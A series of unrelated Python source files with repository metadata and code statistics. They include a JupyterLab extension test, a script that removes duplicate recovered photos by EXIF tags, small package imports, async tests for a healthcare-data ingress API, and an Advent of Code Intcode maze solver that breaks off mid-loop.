042d17a52af06fc6921bba7ad6d32a6db74b8640 | 252 | py | Python | tests/test_init.py | FeatCrush/jupyterlab_iframe | f80ee846b32975e6c46e67bf278fbfa281049a91 | [
"Apache-2.0"
] | 1 | 2020-09-22T03:15:49.000Z | 2020-09-22T03:15:49.000Z | tests/test_init.py | FeatCrush/jupyterlab_iframe | f80ee846b32975e6c46e67bf278fbfa281049a91 | [
"Apache-2.0"
] | null | null | null | tests/test_init.py | FeatCrush/jupyterlab_iframe | f80ee846b32975e6c46e67bf278fbfa281049a91 | [
"Apache-2.0"
] | null | null | null | # for Coverage
from jupyterlab_iframe.__init__ import _jupyter_server_extension_paths
class TestInit:
def test__jupyter_server_extension_paths(self):
assert _jupyter_server_extension_paths() == [{"module": "jupyterlab_iframe.extension"}]
| 31.5 | 95 | 0.801587 | 29 | 252 | 6.310345 | 0.62069 | 0.213115 | 0.360656 | 0.442623 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.119048 | 252 | 7 | 96 | 36 | 0.824324 | 0.047619 | 0 | 0 | 0 | 0 | 0.138655 | 0.113445 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
043e3870fa1463daab648d3929f4fdc0cf575a3e | 3,251 | py | Python | python/image-tools/photo-recovery/remove-duplicate-images.py | bmaupin/graveyard | 71d52fe6589ce13dfe7433906d1aa50df48c9f94 | [
"MIT"
] | 1 | 2019-11-23T10:44:58.000Z | 2019-11-23T10:44:58.000Z | python/image-tools/photo-recovery/remove-duplicate-images.py | bmaupin/graveyard | 71d52fe6589ce13dfe7433906d1aa50df48c9f94 | [
"MIT"
] | 8 | 2020-07-16T07:14:12.000Z | 2020-10-14T17:25:33.000Z | python/image-tools/photo-recovery/remove-duplicate-images.py | bmaupin/graveyard | 71d52fe6589ce13dfe7433906d1aa50df48c9f94 | [
"MIT"
] | 1 | 2019-11-23T10:45:00.000Z | 2019-11-23T10:45:00.000Z | #!/usr/bin/env python
import os
import os.path
import shutil
import sys
import EXIF
source = sys.argv[1]
if not os.path.exists(source):
sys.exit('Enter a valid source directory\n')
for root, dirs, files in os.walk(source, topdown=False):
for file in files:
# only process duplicates
if file.rsplit('.', 1)[0][-3:] == '(2)':
original = file.replace('(2)', '', 1)
d = open(os.path.join(root,file), 'rb')
dup_tags = EXIF.process_file(d)
o = open(os.path.join(root,original), 'rb')
org_tags = EXIF.process_file(o)
if len(dup_tags) == 0:
print 'deleting duplicate: no tags'
os.remove(os.path.join(root, file))
continue
if len(org_tags) == 0:
print 'deleting original: no tags'
os.remove(os.path.join(root, original))
os.rename(os.path.join(root, file), os.path.join(root, original))
continue
if 'EXIF DateTimeOriginal' not in dup_tags and 'Image DateTime' not in dup_tags:
print 'deleting duplicate: no EXIF DateTimeOriginal and no Image DateTime'
os.remove(os.path.join(root, file))
continue
if 'EXIF DateTimeOriginal' not in org_tags and 'Image DateTime' not in org_tags:
print 'deleting original: no EXIF DateTimeOriginal and no Image DateTime'
os.remove(os.path.join(root, original))
os.rename(os.path.join(root, file), os.path.join(root, original))
continue
if 'EXIF DateTimeOriginal' not in dup_tags:
print 'deleting duplicate: no EXIF DateTimeOriginal'
os.remove(os.path.join(root, file))
continue
if 'EXIF DateTimeOriginal' not in org_tags:
print 'deleting original: no EXIF DateTimeOriginal'
os.remove(os.path.join(root, original))
os.rename(os.path.join(root, file), os.path.join(root, original))
continue
if 'Image DateTime' not in dup_tags:
print 'deleting duplicate: no Image DateTime'
os.remove(os.path.join(root, file))
continue
if 'Image DateTime' not in org_tags:
print 'deleting original: no Image DateTime'
os.remove(os.path.join(root, original))
os.rename(os.path.join(root, file), os.path.join(root, original))
continue
if 'Image DateTime' in dup_tags and str(dup_tags['Image DateTime']).find('201') == -1:
print 'deleting duplicate: Image DateTime improperly formatted'
os.remove(os.path.join(root, file))
continue
if 'Image DateTime' in org_tags and str(org_tags['Image DateTime']).find('201') == -1:
print 'deleting original: Image DateTime improperly formatted'
os.remove(os.path.join(root, original))
os.rename(os.path.join(root, file), os.path.join(root, original))
continue
print('duplicate %s still exists' % (file))
| 43.932432 | 98 | 0.563519 | 400 | 3,251 | 4.535 | 0.1675 | 0.079383 | 0.121279 | 0.169791 | 0.752481 | 0.723815 | 0.720507 | 0.720507 | 0.671996 | 0.65215 | 0 | 0.007802 | 0.329745 | 3,251 | 73 | 99 | 44.534247 | 0.82469 | 0.013534 | 0 | 0.403226 | 0 | 0 | 0.225726 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.080645 | null | null | 0.177419 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0453956b5055ce55d54bce7b3aeba86a86d2b12b | 31 | py | Python | pywiktionary/IPA/__init__.py | abuccts/wikt2pron | bfb9c3a3d5d71363ca7e9f8d9967823adcfd8038 | [
"BSD-2-Clause"
] | 22 | 2018-02-22T13:56:27.000Z | 2022-03-14T13:31:13.000Z | pywiktionary/IPA/__init__.py | abuccts/wikt2pron | bfb9c3a3d5d71363ca7e9f8d9967823adcfd8038 | [
"BSD-2-Clause"
] | 5 | 2017-07-21T13:16:15.000Z | 2019-07-05T05:42:57.000Z | pywiktionary/IPA/__init__.py | abuccts/wikt2pron | bfb9c3a3d5d71363ca7e9f8d9967823adcfd8038 | [
"BSD-2-Clause"
] | 4 | 2017-11-26T14:18:40.000Z | 2021-12-23T02:00:09.000Z | from .IPA import IPA_to_XSAMPA
| 15.5 | 30 | 0.83871 | 6 | 31 | 4 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f0ed7b6b51c49e9a6e8e5d6f52213a0283c981dd | 114 | py | Python | tests/test_defectio.py | Darkflame72/revolt.py | 9bb8ca695bd423d9237788b59f79aa3d52946036 | [
"MIT"
] | 26 | 2021-08-29T02:56:52.000Z | 2022-03-11T06:44:22.000Z | tests/test_defectio.py | Darkflame72/revolt.py | 9bb8ca695bd423d9237788b59f79aa3d52946036 | [
"MIT"
] | 36 | 2021-09-03T02:18:28.000Z | 2022-03-01T08:27:57.000Z | tests/test_defectio.py | Darkflame72/revolt.py | 9bb8ca695bd423d9237788b59f79aa3d52946036 | [
"MIT"
] | 18 | 2021-08-29T17:37:58.000Z | 2022-03-31T15:08:15.000Z | import defectio
def test_version() -> None:
"""Mock version."""
assert defectio.__version__ == "0.2.2a"
| 16.285714 | 43 | 0.640351 | 14 | 114 | 4.857143 | 0.785714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032609 | 0.192982 | 114 | 6 | 44 | 19 | 0.706522 | 0.114035 | 0 | 0 | 0 | 0 | 0.063158 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
aceefb86a4e5ecf08f3982f553c0a242f41c7268 | 52 | py | Python | pyunc/__main__.py | jstutters/PyUNC | 15f50d868ce2cfc29eeebb3b932cd5834b9e8cee | [
"MIT"
] | null | null | null | pyunc/__main__.py | jstutters/PyUNC | 15f50d868ce2cfc29eeebb3b932cd5834b9e8cee | [
"MIT"
] | 3 | 2018-08-22T10:02:48.000Z | 2020-03-13T15:25:13.000Z | pyunc/__main__.py | jstutters/PyUNC | 15f50d868ce2cfc29eeebb3b932cd5834b9e8cee | [
"MIT"
] | null | null | null | from pyunc.cli import unc_to_nifti
unc_to_nifti()
| 10.4 | 34 | 0.807692 | 10 | 52 | 3.8 | 0.7 | 0.263158 | 0.526316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134615 | 52 | 4 | 35 | 13 | 0.844444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
4a0ead8d2f771422a5baabc7ea892499687bc7c0 | 5,461 | py | Python | tests/routes/test_ingress.py | LinuxForHealth/connect | 0bb2edc2923633c68b3247006abe98001605adbd | [
"Apache-2.0"
] | 33 | 2020-06-16T11:47:03.000Z | 2022-03-24T02:41:00.000Z | tests/routes/test_ingress.py | LinuxForHealth/connect | 0bb2edc2923633c68b3247006abe98001605adbd | [
"Apache-2.0"
] | 470 | 2020-06-12T01:18:43.000Z | 2022-02-20T23:08:00.000Z | tests/routes/test_ingress.py | LinuxForHealth/connect | 0bb2edc2923633c68b3247006abe98001605adbd | [
"Apache-2.0"
] | 30 | 2020-06-12T19:36:09.000Z | 2022-01-31T15:25:35.000Z | import pytest
from connect.clients import kafka, nats
from connect.config import get_settings
from connect.workflows.core import CoreWorkflow
from unittest.mock import AsyncMock
@pytest.mark.parametrize(
"fixture_name,data_format",
[
("x12_fixture", "X12-005010"),
("fhir_fixture", "FHIR-R4"),
("hl7_fixture", "HL7-V2"),
],
)
@pytest.mark.asyncio
async def test_ingress_post(
fixture_name,
data_format,
request,
async_test_client,
mock_async_kafka_producer,
monkeypatch,
settings,
):
"""
Parameterized /ingress [POST] test with X12, FHIR, and HL7 inputs
:param fixture_name: The name of the pytest fixture used for parameterized testing.
:param data_format: The expected data format for the test case.
:param request: The pytest request fixture used to dynamically access test case fixtures
:param async_test_client: An async test client
:param mock_async_kafka_producer: Mock async kafka producer used to simulate messaging interactions
:param monkeypatch: The pytest monkeypatch fixture.
:param settings: Mocked connect configuration settings.
"""
fixture = request.getfixturevalue(fixture_name)
with monkeypatch.context() as m:
m.setattr(kafka, "ConfluentAsyncKafkaProducer", mock_async_kafka_producer)
m.setattr(CoreWorkflow, "synchronize", AsyncMock())
m.setattr(nats, "get_nats_client", AsyncMock(return_value=AsyncMock()))
m.setattr(nats, "get_jetstream_context", AsyncMock(return_value=AsyncMock()))
async with async_test_client as ac:
# remove external server setting
settings.connect_external_fhir_servers = []
ac._transport.app.dependency_overrides[get_settings] = lambda: settings
actual_response = await ac.post("/ingress", json={"data": fixture})
assert actual_response.status_code == 200
actual_json = actual_response.json()
assert actual_json["uuid"]
assert actual_json["operation"] == "POST"
assert actual_json["creation_date"]
assert actual_json["store_date"]
assert actual_json["consuming_endpoint_url"] == "/ingress"
assert actual_json["data"]
assert actual_json["data_format"] == data_format
assert actual_json["status"] == "success"
assert data_format in actual_json["data_record_location"]
assert actual_json["target_endpoint_urls"] == []
assert actual_json["ipfs_uri"] is None
assert actual_json["elapsed_storage_time"] > 0
assert actual_json["elapsed_storage_time"] > 0
assert actual_json["transmit_date"] is None
assert actual_json["elapsed_transmit_time"] is None
assert actual_json["elapsed_total_time"] > 0
assert actual_json["transmission_attributes"] is None
@pytest.mark.asyncio
async def test_ingress_post_422_error(
async_test_client, mock_async_kafka_producer, monkeypatch, settings, x12_fixture
):
"""
Parameterized /ingress [POST] test with X12, FHIR, and HL7 inputs
:param async_test_client: An async test client
:param mock_async_kafka_producer: Mock async kafka producer used to simulate messaging interactions
:param monkeypatch: The pytest monkeypatch fixture.
:param settings: Mocked connect configuration settings.
"""
invalid_x12 = x12_fixture.replace("ISA", "IPA")
async with async_test_client as ac:
# remove external server setting
settings.connect_external_fhir_servers = []
ac._transport.app.dependency_overrides[get_settings] = lambda: settings
actual_response = await ac.post("/ingress", json={"data": invalid_x12})
assert actual_response.status_code == 422
@pytest.mark.asyncio
async def test_edi_upload(
dicom_fixture,
tmpdir,
async_test_client,
mock_async_kafka_producer,
monkeypatch,
settings,
):
with monkeypatch.context() as m:
m.setattr(kafka, "ConfluentAsyncKafkaProducer", mock_async_kafka_producer)
m.setattr(CoreWorkflow, "synchronize", AsyncMock())
m.setattr(nats, "get_nats_client", AsyncMock(return_value=AsyncMock()))
m.setattr(nats, "get_jetstream_context", AsyncMock(return_value=AsyncMock()))
async with async_test_client as ac:
# remove external server setting
settings.connect_external_fhir_servers = []
ac._transport.app.dependency_overrides[get_settings] = lambda: settings
actual_response = await ac.post(
"/ingress/upload", files={"file": ("dcm_1.dcm", dicom_fixture)}
)
assert actual_response.status_code == 200
actual_json = actual_response.json()
assert actual_json["uuid"]
assert actual_json["operation"] == "POST"
assert actual_json["creation_date"]
assert actual_json["store_date"]
assert actual_json["consuming_endpoint_url"] == "/ingress/upload"
assert actual_json["data"]
assert actual_json["data_format"] == "DICOM"
assert actual_json["status"] == "success"
assert "DICOM" in actual_json["data_record_location"]
assert actual_json["target_endpoint_urls"] == []
assert actual_json["ipfs_uri"] is None
assert actual_json["elapsed_storage_time"] > 0
assert actual_json["elapsed_storage_time"] > 0
assert actual_json["transmit_date"] is None
assert actual_json["elapsed_transmit_time"] is None
assert actual_json["elapsed_total_time"] > 0
assert actual_json["transmission_attributes"] is None
| 40.154412 | 103 | 0.718733 | 669 | 5,461 | 5.594918 | 0.192825 | 0.09618 | 0.136789 | 0.052899 | 0.825274 | 0.817259 | 0.79081 | 0.79081 | 0.769436 | 0.699973 | 0 | 0.010571 | 0.185863 | 5,461 | 135 | 104 | 40.451852 | 0.831309 | 0.016847 | 0 | 0.643564 | 0 | 0 | 0.187217 | 0.057117 | 0 | 0 | 0 | 0 | 0.366337 | 1 | 0 | false | 0 | 0.049505 | 0 | 0.049505 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4a125558f73775f5099682c5f40af9d6869fc3e5 | 124 | py | Python | declare_qtquick/widgets/api/qtquick3d/effects/__init__.py | likianta/declare-qtquick | 93c2ce49d841ccdeb0272085c5f731139927f0d7 | [
"MIT"
] | 3 | 2021-11-02T03:45:27.000Z | 2022-03-27T05:33:36.000Z | declare_qtquick/widgets/api/qtquick3d/effects/__init__.py | likianta/declare-qtquick | 93c2ce49d841ccdeb0272085c5f731139927f0d7 | [
"MIT"
] | null | null | null | declare_qtquick/widgets/api/qtquick3d/effects/__init__.py | likianta/declare-qtquick | 93c2ce49d841ccdeb0272085c5f731139927f0d7 | [
"MIT"
] | null | null | null | from __declare_qtquick_internals__ import qml_imports
qml_imports.add("QtQuick3D.Effects")
from .__list__ import * # noqa
| 24.8 | 53 | 0.822581 | 16 | 124 | 5.625 | 0.75 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009009 | 0.104839 | 124 | 4 | 54 | 31 | 0.801802 | 0.032258 | 0 | 0 | 0 | 0 | 0.144068 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
4a1c06b702794f86d91e058bed98f9eca894f3d4 | 38 | py | Python | AudioRec/__init__.py | joelbarmettlerUZH/AudioRec | 4146a775baeb72fa18de22c78820d9f8a2a95667 | [
"MIT"
] | 5 | 2020-03-06T04:42:34.000Z | 2021-04-23T21:03:34.000Z | AudioRec/__init__.py | joelbarmettlerUZH/AudioRec | 4146a775baeb72fa18de22c78820d9f8a2a95667 | [
"MIT"
] | 1 | 2018-04-07T09:06:00.000Z | 2019-02-09T16:14:43.000Z | AudioRec/__init__.py | joelbarmettlerUZH/AudioRec | 4146a775baeb72fa18de22c78820d9f8a2a95667 | [
"MIT"
] | 2 | 2020-04-06T12:52:34.000Z | 2022-02-16T20:24:23.000Z | from AudioRec.Recorder import Recorder | 38 | 38 | 0.894737 | 5 | 38 | 6.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078947 | 38 | 1 | 38 | 38 | 0.971429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a849a039c1886330eeba0e7dce38eff8d6c87469 | 45 | py | Python | modules/2.79/bpy/types/ShaderNodeBsdfTranslucent.py | cmbasnett/fake-bpy-module | acb8b0f102751a9563e5b5e5c7cd69a4e8aa2a55 | [
"MIT"
] | null | null | null | modules/2.79/bpy/types/ShaderNodeBsdfTranslucent.py | cmbasnett/fake-bpy-module | acb8b0f102751a9563e5b5e5c7cd69a4e8aa2a55 | [
"MIT"
] | null | null | null | modules/2.79/bpy/types/ShaderNodeBsdfTranslucent.py | cmbasnett/fake-bpy-module | acb8b0f102751a9563e5b5e5c7cd69a4e8aa2a55 | [
"MIT"
] | null | null | null | class ShaderNodeBsdfTranslucent:
pass
| 7.5 | 32 | 0.755556 | 3 | 45 | 11.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 45 | 5 | 33 | 9 | 0.971429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
a876a33ab224f10f56b6bfb6b4d40b58f60579c8 | 36 | py | Python | floto/daemon/__init__.py | EpicWink/floto | eb0d93d032b5e14e304e350cee28f27cfe735b73 | [
"MIT"
] | 43 | 2016-02-29T17:44:57.000Z | 2021-12-28T00:41:47.000Z | floto/daemon/__init__.py | EpicWink/floto | eb0d93d032b5e14e304e350cee28f27cfe735b73 | [
"MIT"
] | 9 | 2016-02-29T23:38:36.000Z | 2016-09-02T21:48:00.000Z | floto/daemon/__init__.py | EpicWink/floto | eb0d93d032b5e14e304e350cee28f27cfe735b73 | [
"MIT"
] | 10 | 2016-02-29T16:53:09.000Z | 2018-12-12T00:06:08.000Z | from .unix_daemon import UnixDaemon
| 18 | 35 | 0.861111 | 5 | 36 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 36 | 1 | 36 | 36 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a87b99387f990ce1ed3b76291f317bae744cd188 | 76 | py | Python | objdetect_msgs/src/objdetect_msgs/srv/__init__.py | MRSD2018/reefbot-1 | a595ca718d0cda277726894a3105815cef000475 | [
"MIT"
] | null | null | null | objdetect_msgs/src/objdetect_msgs/srv/__init__.py | MRSD2018/reefbot-1 | a595ca718d0cda277726894a3105815cef000475 | [
"MIT"
] | null | null | null | objdetect_msgs/src/objdetect_msgs/srv/__init__.py | MRSD2018/reefbot-1 | a595ca718d0cda277726894a3105815cef000475 | [
"MIT"
] | null | null | null | from ._DetectObjectGridService import *
from ._DetectObjectService import *
| 25.333333 | 39 | 0.842105 | 6 | 76 | 10.333333 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 76 | 2 | 40 | 38 | 0.911765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
a8aafab8f317d3c72ce53356279be7bb07616c9c | 8,006 | py | Python | 2019/Day15.py | hrmorley34/AdventofCode | 74590422717fb5c6b80ef3fca226359d354c4aec | [
"MIT"
] | null | null | null | 2019/Day15.py | hrmorley34/AdventofCode | 74590422717fb5c6b80ef3fca226359d354c4aec | [
"MIT"
] | null | null | null | 2019/Day15.py | hrmorley34/AdventofCode | 74590422717fb5c6b80ef3fca226359d354c4aec | [
"MIT"
] | null | null | null | import time
from Day09 import IntcodeComputer
PUZZLE_INPUT = input("> ")
INTCODE = [int(x) for x in PUZZLE_INPUT.split(",")]
### PART 1 attempt 1 - non-functional
##def print_maze(maze, dpos=None, path=[]):
## xrange = {pos[0] for pos in maze.keys()}
## yrange = {pos[1] for pos in maze.keys()}
## xmin, xmax = min(xrange), max(xrange)
## ymin, ymax = min(yrange), max(yrange)
## s = "="*(xmax-xmin+1)+"\n"
## for y in range(ymax, ymin-1, -1):
## for x in range(xmin, xmax+1, 1):
## if (x, y) == dpos: s += "D"; continue
## if (x, y) in path: s += "@"; continue
## m = maze.get((x, y), -1)
## if m == -1: s += " "
## elif m == 0: s += "#"
## elif m == 1: s += "."
## elif m == 2: s += "*"
## elif m == 3: s += "0"
## else: s += "?"
## s += "\n"
## s += "="*(xmax-xmin+1)
## print(s+"\n", end="")
##def convdir(x):
## if x%4 == 1: return 1 # N
## elif x%4 == 2: return 4 # E
## elif x%4 == 3: return 2 # S
## elif x%4 == 0: return 3 # W
##
##pos = (0, 0)
##maze = {pos: 3}
##i = IntcodeComputer(INTCODE)
##OXLOC = None
##nextdir = 1
##iteration = 0
##while True:
## if iteration%100 == 0: print_maze(maze, pos)
## iteration += 1
##
## nextdir %= 4
## if nextdir % 4 == 1: # N
## newpos = (pos[0], pos[1] + 1)
## elif nextdir % 4 == 2: # E
## newpos = (pos[0] + 1, pos[1])
## elif nextdir % 4 == 3: # S
## newpos = (pos[0], pos[1] - 1)
## elif nextdir % 4 == 0: # W
## newpos = (pos[0] - 1, pos[1])
##
## i.queue[0].append(convdir(nextdir))
## i.run_until_input()
## code = i.queue[1].pop(0)
##
## #print(pos, DIRNAMES[nextdir%4], code, newpos)
##
## if code == 0:
## if newpos not in maze.keys():
## maze[newpos] = 0
## nextdir += 1
## elif code == 1:
## pos = newpos
## if pos == (0, 0) and OXLOC is not None:
## break
## if pos not in maze.keys():
## maze[pos] = 1
## nextdir -= 1
## elif code == 2:
## maze[newpos] = 2
## OXLOC = newpos
##
##print_maze(maze)
##
##def dist_to_go(pos): return abs(pos[0]-OXLOC[0])+abs(pos[1]-OXLOC[1])
##def neighbours(pos): return [p for p in [(pos[0], pos[1]+1),
## (pos[0]+1, pos[1]),
## (pos[0], pos[1]-1),
## (pos[0]-1, pos[1])]\
## if maze.get(p, 0) != 0]
##
### A*-ish algorithm
##pos = 0
##checked = {}
##to_check = [((0, 0), 0, None)]
##iteration = 0
##while True:
## iteration += 1
## to_check.sort(key=lambda x: dist_to_go(x[0]))
##
## pos, d, from_ = to_check.pop(0)
## if pos == OXLOC:
## checked[pos] = (from_, d)
## break
## nbrs = neighbours(pos)
## for n in nbrs:
## if n not in checked.keys():
## to_check.append((n, d+1, pos))
## checked[pos] = (from_, d)
##
## if iteration%2 == 0:
## chain = []
## chainfrom = from_
## while chainfrom not in [None, (0, 0)]:
## chain.append(chainfrom)
## chainfrom, _ = checked[chainfrom]
## print_maze(maze, path=chain)
##### Brute-force algorithm
####pos = 0
####checked = {}
####to_check = [((0, 0), 0, None)]
####iteration = 0
####while True:
#### iteration += 1
#### to_check.sort(key=lambda x: x[1])
####
#### pos, d, from_ = to_check.pop(0)
#### if pos == OXLOC:
#### checked[pos] = (from_, d)
#### break
#### nbrs = neighbours(pos)
#### for n in nbrs:
#### if n not in checked.keys():
#### to_check.append((n, d+1, pos))
#### checked[pos] = (from_, d)
####
#### if iteration%5 == 0:
#### chain = []
#### chainfrom = from_
#### while chainfrom not in [None, (0, 0)]:
#### chain.append(chainfrom)
#### chainfrom, _ = checked[chainfrom]
#### print_maze(maze, path=chain)
##
##chain = []
##chainfrom, n = checked[OXLOC]
##print(n)
##while chainfrom != (0, 0):
## chain.append(chainfrom)
## chainfrom, n = checked[chainfrom]
## print(n)
##print_maze(maze, path=chain)
##print(checked[OXLOC][1])
# PART 1 attempt 2 - functional
def print_maze(maze, dpos=None, path=[]):
xrange = {pos[0] for pos in maze.keys()}
yrange = {pos[1] for pos in maze.keys()}
xmin, xmax = min(xrange), max(xrange)
ymin, ymax = min(yrange), max(yrange)
s = "="*(xmax-xmin+1)+"\n"
for y in range(ymax, ymin-1, -1):
for x in range(xmin, xmax+1, 1):
if (x, y) == dpos: s += "D"; continue
if (x, y) == (0,0): s += "0"; continue
if (x, y) == OXLOC: s += "*"; continue
if (x, y) in path: s += "@"; continue
m = maze.get((x, y), -1)
if m == -1: s += " "
elif m == None: s += "#"
else: s += "."
s += "\n"
s += "="*(xmax-xmin+1)
print(s+"\n", end="")
def convdir(x):
if x%4 == 1: return 1 # N
elif x%4 == 2: return 4 # E
elif x%4 == 3: return 2 # S
elif x%4 == 0: return 3 # W
pos = (0, 0)
pscore = 0
maze = {pos: pscore}
i = IntcodeComputer(INTCODE)
OXLOC = None
nextdir = 1
iteration = 0
while True:
if iteration%100 == 0: print_maze(maze, pos)
iteration += 1
nextdir %= 4
if nextdir % 4 == 1: # N
newpos = (pos[0], pos[1] + 1)
elif nextdir % 4 == 2: # E
newpos = (pos[0] + 1, pos[1])
elif nextdir % 4 == 3: # S
newpos = (pos[0], pos[1] - 1)
elif nextdir % 4 == 0: # W
newpos = (pos[0] - 1, pos[1])
i.queue[0].append(convdir(nextdir))
i.run_until_input()
code = i.queue[1].pop(0)
#print(pos, DIRNAMES[nextdir%4], code, newpos)
if code == 0:
if newpos not in maze.keys():
maze[newpos] = None
nextdir += 1
elif code == 1:
pos = newpos
if pos not in maze.keys():
pscore += 1
maze[pos] = pscore
else:
pscore = maze[pos]
nextdir -= 1
elif code == 2:
pscore += 1
maze[newpos] = pscore
pos = OXLOC = newpos
break
ANSWER_P1 = pscore
# PART 2
def print_maze_p2(maze):
xrange = {pos[0] for pos in maze.keys()}
yrange = {pos[1] for pos in maze.keys()}
xmin, xmax = min(xrange), max(xrange)
ymin, ymax = min(yrange), max(yrange)
s = "="*(xmax-xmin+1)+"\n"
for y in range(ymax, ymin-1, -1):
for x in range(xmin, xmax+1, 1):
if (x, y) == (0,0): s += "0"; continue
if (x, y) == OXLOC: s += "*"; continue
m = maze.get((x, y), -1)
if m == -1: s += " "
elif m == None: s += "#"
elif m == False: s += "."
else: s += "@"
s += "\n"
s += "="*(xmax-xmin+1)
print(s+"\n", end="")
pscore = 0
maze = {p: (False if isinstance(maze[p], int) else maze[p]) for p in maze.keys()}
maze[pos] = 0
nextdir = 1
iteration = 0
while False in maze.values():
if iteration%500 == 0: print_maze_p2(maze)
iteration += 1
nextdir %= 4
if nextdir % 4 == 1: # N
newpos = (pos[0], pos[1] + 1)
elif nextdir % 4 == 2: # E
newpos = (pos[0] + 1, pos[1])
elif nextdir % 4 == 3: # S
newpos = (pos[0], pos[1] - 1)
elif nextdir % 4 == 0: # W
newpos = (pos[0] - 1, pos[1])
i.queue[0].append(convdir(nextdir))
i.run_until_input()
code = i.queue[1].pop(0)
